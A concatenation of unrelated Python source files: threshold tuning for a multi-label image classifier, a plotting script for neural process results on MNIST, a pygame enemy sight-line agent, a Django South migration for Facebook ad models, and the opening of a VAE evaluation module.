f1_opt = f1_score(labels[:, key], data[:, key] > f1/2+1e-3, average='binary')
f1_sub = f1_score(labels[:, key], data[:, key] > thresholds_sub[key], average='binary')
prob_sub = np.sum(data[:, key] > thresholds_sub[key]) * 100.0 / data.shape[0]
prob_05 = np.sum(data[:, key] > threshold) * 100.0 / data.shape[0]
f1_hist.append(f1)
f1_05_hist.append(f1_05)
f1_opt_hist.append(f1_opt)
f1_sub_hist.append(f1_sub)
# prob = samples[key] * 100.0 / data.shape[0]
print(f'{key:3} train {train_probs[key]:02.2f} 0.5: {prob_05:02.2f} sub: {prob_sub:02.2f} '
f'f1 th {threshold} {f1:0.2f} '
f'f1 th {f1/2+1e-3:0.2f} {f1_opt:0.2f} '
f'f1 sub th {thresholds_sub[key]} {f1_sub:0.2f}')
print(f'F1 0.5 {np.mean(f1_05_hist):0.2} {threshold} {np.mean(f1_hist):0.2} th f1/2 {np.mean(f1_opt_hist):0.2} '
f'th sub {np.mean(f1_sub_hist):0.2}')
def predict_oof(submission_name):
results = defaultdict(list)
submission_config = yaml.load(open(f'../submissions/{submission_name}.yaml'))
# make sure all models using the same folds split
model_name = submission_config['models'][0]['model']
model_info = MODELS[model_name]
datasets = [
ClassificationDataset(
fold=fold,
is_training=False,
transform=lambda x: torch.from_numpy(x),
folds_split=model_info.folds_split
)
for fold in config.FOLDS
]
data_loaders = [
DataLoader(
datasets[fold],
num_workers=8,
batch_size=16,
drop_last=False)
for fold in config.FOLDS
]
os.makedirs('../output/predict_oof', exist_ok=True)
all_fold_labels = {}
for model_cfg in submission_config['models']:
model_name = model_cfg['model']
run = model_cfg.get('run', '')
folds = model_cfg.get('folds', config.FOLDS)
run_str = '' if run is None else f'_{run}'
model_info = MODELS[model_name]
print(model_name)
for fold in folds:
checkpoint = model_cfg['fold_checkpoints'][fold]
checkpoints_dir = f'../output/checkpoints/{model_name}{run_str}_{fold}'
print(f'fold {fold} checkpoint {checkpoint}')
cache_fn = f'../output/predict_oof/{model_name}{run_str}_fold_{fold}_ch_{checkpoint:03}.pt'
try:
fold_outputs, fold_labels = torch.load(cache_fn)
except FileNotFoundError:
model = model_info.factory(**model_info.args)
state_dict = torch.load(f'{checkpoints_dir}/{checkpoint:03}.pt')
if 'model_state_dict' in state_dict:
state_dict = state_dict['model_state_dict']
model.load_state_dict(state_dict)
model = model.cuda()
model.eval()
with torch.set_grad_enabled(False):
fold_outputs = []
fold_labels = []
for iter_num, data in tqdm(enumerate(data_loaders[fold]), total=len(data_loaders[fold])):
img = data['img'].cuda()
labels = data['labels'].detach().cpu().numpy()
output = model(img)
output = torch.sigmoid(output)
fold_labels.append(labels)
fold_outputs.append(output.detach().cpu().numpy())
fold_labels = np.concatenate(fold_labels, axis=0)
fold_outputs = np.concatenate(fold_outputs, axis=0)
torch.save((fold_outputs, fold_labels), cache_fn)
all_fold_labels[fold] = fold_labels
print_perc_and_f1_from_prob(fold_outputs, fold_labels, thresholds_sub=submission_config['thresholds'])
results[fold].append(fold_outputs)
for fold in results.keys():
fold_results = np.mean(np.array(results[fold]), axis=0)
print('fold', fold)
print_perc_and_f1_from_prob(fold_results, all_fold_labels[fold], thresholds_sub=submission_config['thresholds'])
def find_threshold(data, cls, plot=None, plot_label=''):
# threshold_table = np.zeros((data.shape[0], 2))
# threshold_table[:, 0] = sorted(data[:, cls])
# for i, th in enumerate(threshold_table[:, 0]):
# f1 = f1_score(gt, data[:, cls] > th, average='macro')
# threshold_table[i, 1] = f1
gt = data[1][:, cls]
thresholds = []
f1_values = []
th = 1e-3
while th < 1:
f1 = f1_score(gt, data[0][:, cls] > th, average='binary')
thresholds.append(th)
f1_values.append(f1)
th *= 1.025
top_threshold = thresholds[np.argmax(f1_values)]
print(f'cls {cls} th {top_threshold:.03} f1 {max(f1_values):.3}')
if plot:
plot.plot(thresholds, f1_values, label=plot_label)
return thresholds, f1_values
def find_threshold_from_oof(submission_name):
results = defaultdict(list)
submission_config = yaml.load(open(f'../submissions/{submission_name}.yaml'))
# make sure all models using the same folds split
model_name = submission_config['models'][0]['model']
model_info = MODELS[model_name]
datasets = [
ClassificationDataset(
fold=fold,
is_training=False,
transform=lambda x: torch.from_numpy(x),
folds_split=model_info.folds_split
)
for fold in config.FOLDS
]
submission_config = yaml.load(open(f'../submissions/{submission_name}.yaml'))
for model_cfg in submission_config['models']:
model_name = model_cfg['model']
run = model_cfg.get('run', '')
folds = model_cfg.get('folds', config.FOLDS)
run_str = '' if run is None else f'_{run}'
print(model_name)
model_fold_outputs = []
for fold in folds:
checkpoint = model_cfg['fold_checkpoints'][fold]
print(f'fold {fold} checkpoint {checkpoint}')
cache_fn = f'../output/predict_oof/{model_name}{run_str}_fold_{fold}_ch_{checkpoint:03}.pt'
fold_outputs = torch.load(cache_fn)
# print_perc_and_f1_from_prob(fold_outputs, thresholds_sub=submission_config['thresholds'])
results[fold].append(fold_outputs)
model_fold_outputs.append(fold_outputs)
all_combined_f1 = []
f, axx = plt.subplots(6, 5)
for cls in range(config.NB_CATEGORIES):
# plt.figure()
ax = axx[cls // 5, cls % 5]
ax.set_title(str(cls))
print()
thresholds = []
f1_values = []
for fold in folds:
# samples = datasets[fold].samples
# gt = np.array([sample.labels[cls] for sample in samples])
fold_thresholds, fold_f1_values = find_threshold(
model_fold_outputs[fold],
cls=cls,
plot=ax,
plot_label=f'cls {cls} fold {fold}')
thresholds.append(fold_thresholds)
f1_values.append(fold_f1_values)
thresholds = np.mean(np.array(thresholds), axis=0)
f1_values = np.mean(np.array(f1_values), axis=0)
top_threshold = thresholds[np.argmax(f1_values)]
print(f'cls {cls} th {top_threshold:.03} f1 {max(f1_values):.3} combined')
all_combined_f1.append(max(f1_values))
# f1 = f1_score(gt, model_fold_outputs[fold][0][:, cls] > th, average='binary')
# plt.legend()
print('F1 ', np.mean(all_combined_f1))
plt.show()
# for fold in results.keys():
# fold_results = np.mean(np.array(results[fold]), axis=0)
# print('fold', fold)
# print_perc_and_f1_from_prob(fold_results, thresholds_sub=submission_config['thresholds'])
def check(submission_name):
try:
df = pd.read_csv(submission_name, dtype={'Id': str, 'Predicted': str}, na_values='')
submission_config = yaml.load(submission_name[:-3]+'yaml')
except FileNotFoundError:
df = pd.read_csv(f'../submissions/{submission_name}.csv', dtype={'Id': str, 'Predicted': str}, na_values='')
submission_config = yaml.load(open(f'../submissions/{submission_name}.yaml'))
samples = defaultdict(int)
for line in df.Predicted:
line = str(line)
if line == 'nan':
continue
for item in line.split():
samples[int(item)] += 1
for key in sorted(samples.keys()):
prob = samples[key] * 100.0 / len(df.Predicted)
threshold = submission_config['thresholds'][key]
print(f'{key:3} {prob:0.2f} {train_probs[key]:0.2f} {threshold}')
def main():
parser = argparse.ArgumentParser()
parser.add_argument('action', type=str, default='predict')
parser.add_argument('--submission', type=str)
args = parser.parse_args()
action = args.action
submission_name = args.submission
if action == 'predict':
predict(submission_name)
check(submission_name)
if action == 'check':
check(submission_name)
if action == 'predict_oof':
predict_oof(submission_name)
if action == 'find_threshold_from_oof':
find_threshold_from_oof(submission_name)
if __name__ == '__main__':
main()
|
import os, argparse, math
import pickle as pkl
import numpy as np
import matplotlib
from matplotlib import rc
import matplotlib.pyplot as plt
from scipy import misc
import tensorflow as tf
from utils import reordering
matplotlib.rcParams['text.latex.unicode']=True
rc('font', **{'family': 'serif', 'serif': ['Computer Modern']})
rc('text', usetex=True)
img_name = '2d_mnist_app_'
##############################################
# mnist
#sample_idx=900000
#b_idx=0
#b_idx=1
#b_idx=2
sample_idx=801000
b_idx=0
img_name += str(sample_idx).zfill(7)+'_'+str(b_idx).zfill(2)+'.png'
prefix = '../logs_mnist_c/'
dirs = [
#'07-25,10:24:11.220550', # NP(h=128)
'07-25,10:24:15.632419', # ANP(h=128)
'10-22,16:12:26.898386', # SNP(h=128)
'12-28,08:07:05.227516', # SNP-Att(K=inf)
'07-25,10:24:09.806928', # SNP-RMRA(h=128,K=25)
]
for i in range(len(dirs)):
dirs[i] = prefix+dirs[i]
labels = [
#'NP',
'ANP',
'SNP',
#'SNP-W(K=25)',
#'SNP-RMR(K=25)',
#'ASNP-W(K=25)',
#'ASNP-RMR(K=25)',
'ASNP-W',
'ASNP-RMR',
]
# get data
data = []
h_x_list = []
for idx, direc in enumerate(dirs):
with open(os.path.join(direc,'data'+str(sample_idx).zfill(7)+'.pickle'),
'rb') as f:
pred = pkl.load(f)
std = pkl.load(f)
query = pkl.load(f)
target = pkl.load(f)
hyperparam = pkl.load(f)
#if idx == len(labels)-1:
# h_x_list.append(pkl.load(f))
if idx == 0:
canvas_size = int(math.sqrt(len(target[0][0])))
# [target_x, target_y, context_x, context_y, pred_y, std_y]
if 'SNP' in labels[idx]:
data.append(reordering(query, target, pred, std, temporal=True))
else:
data.append(reordering(query, target, pred, std, temporal=False))
# plotting
pqset_point = [1.0,0.0,0.0] # Red
T = np.arange(0,50,5)
plt.figure(figsize=(4.8*(2+len(labels)), 4.8*len(T))) # [context, target(withIm), models] * len(T)
for t_idx, t in enumerate(T):
for i in range(len(labels)):
target_x, target_y, context_x, context_y, pred_y, std = data[i]
tar_canvas = np.ones((canvas_size,canvas_size,3))
cont_canvas = np.ones((canvas_size,canvas_size,3))
cont_canvas[:,:,:] = 1.0 # default color: white
tar_y = target_y[t][b_idx] + 0.5
con_x = ((context_x[t][b_idx] + 1.0) / 2) * (canvas_size-1) + 0.5
con_y = context_y[t][b_idx] + 0.5
pred_canvas = np.ones((canvas_size,canvas_size,3))
std_canvas = np.ones((canvas_size,canvas_size,3))
im_canvas = np.ones((canvas_size,canvas_size,3))
# denormalization
tar_x = ((target_x[t][b_idx] + 1.0) / 2) * (canvas_size-1) + 0.5
pre_y = pred_y[t][b_idx] + 0.5
std_y = std[t][b_idx] + 0.5
for j in range(len(tar_x)):
x_loc = int(tar_x[j][0])
y_loc = int(tar_x[j][1])
#if i == 0:
tar_canvas[x_loc][y_loc] = 1-tar_y[j][0]
pred_canvas[x_loc][y_loc] = np.clip(1-pre_y[j][0],0,1)
std_canvas[x_loc][y_loc] = np.clip(1-std_y[j][0],0,1)
if i == len(labels)-1:
for j in range(len(con_x)):
x_loc = int(con_x[j][0])
y_loc = int(con_x[j][1])
if con_y[j][0]!=0:
cont_canvas[x_loc][y_loc] = 1-con_y[j][0]
else:
cont_canvas[x_loc][y_loc] = 0
cont_canvas[x_loc][y_loc][2] = 1
# drawing target and context
if i == len(labels)-1:
plt.subplot(len(T),2+len(labels),t_idx*(2+len(labels))+1)
plt.imshow(cont_canvas)
plt.xticks([])
plt.yticks([])
if t_idx == 0:
plt.title(r'Context',fontsize=40)
plt.ylabel(r'$'+str(t+1)+'$',fontsize=50)
plt.subplot(len(T),2+len(labels),t_idx*(2+len(labels))+2)
plt.imshow(tar_canvas)
plt.xticks([])
plt.yticks([])
if t_idx == 0:
plt.title(r'Target',fontsize=40)
plt.subplot(len(T),2+len(labels),t_idx*(2+len(labels))+i+3)
plt.imshow(pred_canvas)
plt.xticks([])
plt.yticks([])
if t_idx == 0:
plt.title(r''+labels[i],fontsize=40)
##############################################
# saving
plt.subplots_adjust(wspace=0.1, hspace=0.1)
plt.savefig(img_name, bbox_inches='tight')
plt.close()
|
<reponame>yumauri/kings_and_pigs
import pygame
from .sight_line import SightLine
from .states import Idle, Patrol
class Agent:
def __init__(self, width, height, enemy, hero):
self.view_width = width
self.view_height = height
self.enemy = enemy
self.hero = hero
self.sights = [
SightLine(width, height),
SightLine(width, height),
SightLine(width, height),
]
self.seeing_hero = False
self.layer = pygame.Surface([width, height], pygame.SRCALPHA, 32)
self.font = pygame.font.Font(None, 16)
# initial state could be either Idle or Patrol
self.state = Patrol(self) if "patrol" in self.enemy.type else Idle(self)
def check_hero_visibility(self, chamber, offset_x, offset_y):
if self.hero.lives <= 0:
return False
hero_hit_box = self.hero.get_hit_box()
self_hit_box = self.enemy.get_hit_box()
self.seeing_hero = True
# if facing hero side - check collisions with walls and floors
if (self.enemy.facing_right and self_hit_box.left <= hero_hit_box.left) or (
not self.enemy.facing_right and self_hit_box.right >= hero_hit_box.right
):
self.sights[0].update(
True,
(self_hit_box.centerx - offset_x, self_hit_box.y + 3 - offset_y),
(hero_hit_box.centerx - offset_x, hero_hit_box.y - offset_y),
)
self.sights[1].update(
True,
(self_hit_box.centerx - offset_x, self_hit_box.y + 3 - offset_y),
(
hero_hit_box.centerx - offset_x,
hero_hit_box.y + (hero_hit_box.height - 3) // 2 - offset_y,
),
)
self.sights[2].update(
True,
(self_hit_box.centerx - offset_x, self_hit_box.y + 3 - offset_y),
(hero_hit_box.centerx - offset_x, hero_hit_box.bottom - 3 - offset_y),
)
# check collisions
open_view = [True for _ in self.sights]
for block in chamber.inactive_sprites:
for i, sight in enumerate(self.sights):
if open_view[i] and sight.collides_with(block, offset_x, offset_y):
open_view[i] = False
if not any(open_view):
break
self.seeing_hero = any(open_view)
# facing opposite side from hero - agent doesn't see hero
else:
self.seeing_hero = False
for sight in self.sights:
sight.update()
def update(self, chamber, offset_x, offset_y):
self.check_hero_visibility(chamber, offset_x, offset_y)
# change state only when enemy stands on the firm ground
if self.enemy.on_ground:
self.state.update(chamber)
def draw(self, chamber, offset_x, offset_y, debug=False):
self.layer.fill((0, 0, 0, 0))
# in case of debug
if debug:
# draw lines of sight
for sight in self.sights:
self.layer.blit(sight.image, [0, 0])
# draw collisions points
for block in chamber.inactive_sprites:
for i, sight in enumerate(self.sights):
dot = sight.collides_with(block, offset_x, offset_y)
if dot:
pygame.draw.circle(self.layer, (0, 255, 0, 200), dot, 3)
# draw agent state
hit_box = self.enemy.get_hit_box()
state = self.font.render(str(self.state), True, (0, 0, 0))
x = hit_box.centerx - state.get_width() / 2 - offset_x
y = hit_box.top - state.get_height() - 10 - offset_y
pygame.draw.rect(
self.layer,
(255, 255, 255),
(x - 2, y - 2, state.get_width() + 4, state.get_height() + 4),
)
self.layer.blit(state, (x, y))
|
<filename>facebook_ads/migrations/0009_auto__add_adstatistic__add_field_adgroup_creative__chg_field_adgroup_t.py
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'AdStatistic'
db.create_table('facebook_ads_adstatistic', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('statistic_id', self.gf('django.db.models.fields.CharField')(unique=True, max_length='100')),
('account', self.gf('django.db.models.fields.related.ForeignKey')(related_name='adstatistics', null=True, to=orm['facebook_ads.AdAccount'])),
('campaign', self.gf('django.db.models.fields.related.ForeignKey')(related_name='adstatistics', null=True, to=orm['facebook_ads.AdCampaign'])),
('adgroup', self.gf('django.db.models.fields.related.ForeignKey')(related_name='adstatistics', null=True, to=orm['facebook_ads.AdGroup'])),
('start_time', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('end_time', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('impressions', self.gf('django.db.models.fields.IntegerField')()),
('clicks', self.gf('django.db.models.fields.IntegerField')()),
('spent', self.gf('django.db.models.fields.IntegerField')()),
('social_impressions', self.gf('django.db.models.fields.IntegerField')()),
('social_clicks', self.gf('django.db.models.fields.IntegerField')()),
('social_spent', self.gf('django.db.models.fields.IntegerField')()),
('actions', self.gf('django.db.models.fields.IntegerField')()),
('unique_impressions', self.gf('django.db.models.fields.IntegerField')()),
('unique_clicks', self.gf('django.db.models.fields.IntegerField')()),
('social_unique_impressions', self.gf('django.db.models.fields.IntegerField')()),
('social_unique_clicks', self.gf('django.db.models.fields.IntegerField')()),
('connections', self.gf('django.db.models.fields.IntegerField')()),
))
db.send_create_signal('facebook_ads', ['AdStatistic'])
# Adding field 'AdGroup.creative'
db.add_column('facebook_ads_adgroup', 'creative', self.gf('django.db.models.fields.related.ForeignKey')(default=None, related_name='adgroups', to=orm['facebook_ads.AdCreative']), keep_default=False)
# Changing field 'AdGroup.targeting'
db.alter_column('facebook_ads_adgroup', 'targeting_id', self.gf('django.db.models.fields.related.OneToOneField')(default=0, unique=True, to=orm['facebook_ads.Targeting']))
# Changing field 'AdCreative.run_status'
db.alter_column('facebook_ads_adcreative', 'run_status', self.gf('django.db.models.fields.SmallIntegerField')(null=True))
# Changing field 'AdCreative.type'
db.alter_column('facebook_ads_adcreative', 'type', self.gf('django.db.models.fields.IntegerField')(null=True))
# Changing field 'AdCampaign.start_time'
db.alter_column('facebook_ads_adcampaign', 'start_time', self.gf('django.db.models.fields.DateTimeField')(null=True))
# Changing field 'AdCampaign.updated_time'
db.alter_column('facebook_ads_adcampaign', 'updated_time', self.gf('django.db.models.fields.DateTimeField')(null=True))
# Changing field 'AdCampaign.campaign_status'
db.alter_column('facebook_ads_adcampaign', 'campaign_status', self.gf('django.db.models.fields.SmallIntegerField')(null=True))
# Changing field 'AdCampaign.daily_imps'
db.alter_column('facebook_ads_adcampaign', 'daily_imps', self.gf('django.db.models.fields.IntegerField')(null=True))
# Changing field 'AdAccount.daily_spend_limit'
db.alter_column('facebook_ads_adaccount', 'daily_spend_limit', self.gf('django.db.models.fields.IntegerField')(null=True))
# Changing field 'AdAccount.vat_status'
db.alter_column('facebook_ads_adaccount', 'vat_status', self.gf('django.db.models.fields.IntegerField')(null=True))
# Changing field 'AdAccount.timezone_id'
db.alter_column('facebook_ads_adaccount', 'timezone_id', self.gf('django.db.models.fields.IntegerField')(null=True))
# Changing field 'AdAccount.account_status'
db.alter_column('facebook_ads_adaccount', 'account_status', self.gf('django.db.models.fields.SmallIntegerField')(null=True))
# Changing field 'AdAccount.is_personal'
db.alter_column('facebook_ads_adaccount', 'is_personal', self.gf('django.db.models.fields.IntegerField')(null=True))
def backwards(self, orm):
# Deleting model 'AdStatistic'
db.delete_table('facebook_ads_adstatistic')
# Deleting field 'AdGroup.creative'
db.delete_column('facebook_ads_adgroup', 'creative_id')
# Changing field 'AdGroup.targeting'
db.alter_column('facebook_ads_adgroup', 'targeting_id', self.gf('django.db.models.fields.related.OneToOneField')(unique=True, null=True, to=orm['facebook_ads.Targeting']))
# Changing field 'AdCreative.run_status'
db.alter_column('facebook_ads_adcreative', 'run_status', self.gf('django.db.models.fields.SmallIntegerField')(default=None))
# Changing field 'AdCreative.type'
db.alter_column('facebook_ads_adcreative', 'type', self.gf('django.db.models.fields.IntegerField')(default=None))
# Changing field 'AdCampaign.start_time'
db.alter_column('facebook_ads_adcampaign', 'start_time', self.gf('django.db.models.fields.DateTimeField')(default=None))
# Changing field 'AdCampaign.updated_time'
db.alter_column('facebook_ads_adcampaign', 'updated_time', self.gf('django.db.models.fields.DateTimeField')(default=None))
# Changing field 'AdCampaign.campaign_status'
db.alter_column('facebook_ads_adcampaign', 'campaign_status', self.gf('django.db.models.fields.SmallIntegerField')(default=None))
# Changing field 'AdCampaign.daily_imps'
db.alter_column('facebook_ads_adcampaign', 'daily_imps', self.gf('django.db.models.fields.IntegerField')(default=None))
# Changing field 'AdAccount.daily_spend_limit'
db.alter_column('facebook_ads_adaccount', 'daily_spend_limit', self.gf('django.db.models.fields.IntegerField')(default=None))
# Changing field 'AdAccount.vat_status'
db.alter_column('facebook_ads_adaccount', 'vat_status', self.gf('django.db.models.fields.IntegerField')(default=None))
# Changing field 'AdAccount.timezone_id'
db.alter_column('facebook_ads_adaccount', 'timezone_id', self.gf('django.db.models.fields.IntegerField')(default=None))
# Changing field 'AdAccount.account_status'
db.alter_column('facebook_ads_adaccount', 'account_status', self.gf('django.db.models.fields.SmallIntegerField')(default=None))
# Changing field 'AdAccount.is_personal'
db.alter_column('facebook_ads_adaccount', 'is_personal', self.gf('django.db.models.fields.IntegerField')(default=None))
models = {
'facebook_ads.adaccount': {
'Meta': {'object_name': 'AdAccount'},
'account_id': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
'account_status': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'business_city': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'business_country_code': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'business_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'business_state': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'business_street': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'business_street2': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'business_zip': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'currency': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'daily_spend_limit': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_personal': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'timezone_id': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'timezone_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'vat_status': ('django.db.models.fields.IntegerField', [], {'null': 'True'})
},
'facebook_ads.adcampaign': {
'Meta': {'object_name': 'AdCampaign'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adcampaigns'", 'to': "orm['facebook_ads.AdAccount']"}),
'campaign_id': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
'campaign_status': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'daily_budget': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'daily_imps': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'end_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lifetime_budget': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'start_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'updated_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
'facebook_ads.adcreative': {
'Meta': {'object_name': 'AdCreative'},
'auto_update': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'body': ('django.db.models.fields.CharField', [], {'max_length': '135'}),
'count_current_adgroups': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'creative_id': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_hash': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'image_url': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'link_url': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'object_id': ('django.db.models.fields.BigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'preview_url': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'related_fan_page': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'run_status': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'story_id': ('django.db.models.fields.BigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '25'}),
'type': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'view_tag': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'facebook_ads.adgroup': {
'Meta': {'object_name': 'AdGroup'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adgroups'", 'to': "orm['facebook_ads.AdAccount']"}),
'ad_id': ('django.db.models.fields.BigIntegerField', [], {}),
'ad_status': ('django.db.models.fields.IntegerField', [], {}),
'adgroup_id': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
'adgroup_status': ('django.db.models.fields.IntegerField', [], {}),
'bid_type': ('django.db.models.fields.IntegerField', [], {}),
'campaign': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adgroups'", 'to': "orm['facebook_ads.AdCampaign']"}),
'creative': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adgroups'", 'to': "orm['facebook_ads.AdCreative']"}),
'end_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_bid': ('django.db.models.fields.IntegerField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'start_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'targeting': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'adgroup'", 'unique': 'True', 'to': "orm['facebook_ads.Targeting']"}),
'updated_time': ('django.db.models.fields.DateTimeField', [], {})
},
'facebook_ads.adstatistic': {
'Meta': {'object_name': 'AdStatistic'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adstatistics'", 'null': 'True', 'to': "orm['facebook_ads.AdAccount']"}),
'actions': ('django.db.models.fields.IntegerField', [], {}),
'adgroup': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adstatistics'", 'null': 'True', 'to': "orm['facebook_ads.AdGroup']"}),
'campaign': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adstatistics'", 'null': 'True', 'to': "orm['facebook_ads.AdCampaign']"}),
'clicks': ('django.db.models.fields.IntegerField', [], {}),
'connections': ('django.db.models.fields.IntegerField', [], {}),
'end_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'impressions': ('django.db.models.fields.IntegerField', [], {}),
'social_clicks': ('django.db.models.fields.IntegerField', [], {}),
'social_impressions': ('django.db.models.fields.IntegerField', [], {}),
'social_spent': ('django.db.models.fields.IntegerField', [], {}),
'social_unique_clicks': ('django.db.models.fields.IntegerField', [], {}),
'social_unique_impressions': ('django.db.models.fields.IntegerField', [], {}),
'spent': ('django.db.models.fields.IntegerField', [], {}),
'start_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'statistic_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': "'100'"}),
'unique_clicks': ('django.db.models.fields.IntegerField', [], {}),
'unique_impressions': ('django.db.models.fields.IntegerField', [], {})
},
'facebook_ads.targeting': {
'Meta': {'object_name': 'Targeting'},
'age_max': ('facebook_ads.fields.PositiveSmallIntegerRangeField', [], {'null': 'True', 'blank': 'True'}),
'age_min': ('facebook_ads.fields.PositiveSmallIntegerRangeField', [], {'null': 'True', 'blank': 'True'}),
'broad_age': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'cities': ('facebook_ads.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'college_majors': ('facebook_ads.fields.CommaSeparatedCharField', [], {'max_length': '100'}),
'college_networks': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'college_years': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '100'}),
'connections': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '100'}),
'countries': ('facebook_ads.fields.CommaSeparatedCharField', [], {'max_length': '100', 'blank': 'True'}),
'education_statuses': ('facebook_ads.fields.CommaSeparatedCharField', [], {'max_length': '100'}),
'excluded_connections': ('facebook_ads.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'friends_of_connections': ('facebook_ads.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'genders': ('facebook_ads.fields.CommaSeparatedCharField', [], {'max_length': '5', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'interested_in': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'keywords': ('facebook_ads.fields.CommaSeparatedCharField', [], {'max_length': '4000'}),
'locales': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'radius': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'regions': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'relationship_statuses': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'user_adclusters': ('facebook_ads.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'user_event': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '100'}),
'work_networks': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'zips': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['facebook_ads']
|
import math
import numpy as np
import torch
from mimic.evaluation.divergence_measures.mm_div import alpha_poe
from mimic.utils import utils
from mimic import log
LOG2PI = float(np.log(2.0 * math.pi))
def get_latent_samples(flags, latents, n_imp_samples, mod_names=None):
l_c = latents['content']
l_s = latents['style']
l_c_m_rep = l_c[0].unsqueeze(0).repeat(n_imp_samples, 1, 1)
l_c_lv_rep = l_c[1].unsqueeze(0).repeat(n_imp_samples, 1, 1)
c_emb = utils.reparameterize(l_c_m_rep, l_c_lv_rep)
styles = {}
c = {'mu': l_c_m_rep, 'logvar': l_c_lv_rep, 'z': c_emb}
if flags.factorized_representation:
for k, key in enumerate(l_s.keys()):
l_s_mod = l_s[key]
l_s_m_rep = l_s_mod[0].unsqueeze(0).repeat(n_imp_samples, 1, 1)
l_s_lv_rep = l_s_mod[1].unsqueeze(0).repeat(n_imp_samples, 1, 1)
s_emb = utils.reparameterize(l_s_m_rep, l_s_lv_rep)
s = {'mu': l_s_m_rep, 'logvar': l_s_lv_rep, 'z': s_emb}
styles[key] = s
else:
for k, key in enumerate(mod_names):
styles[key] = None
return {'content': c, 'style': styles}
def get_dyn_prior(weights, mus, logvars):
mu_poe, logvar_poe = alpha_poe(weights, mus, logvars)
return [mu_poe, logvar_poe]
def log_mean_exp(x, dim=1):
"""
log(1/k * sum(exp(x))): this normalizes x.
@param x: PyTorch.Tensor
samples from gaussian
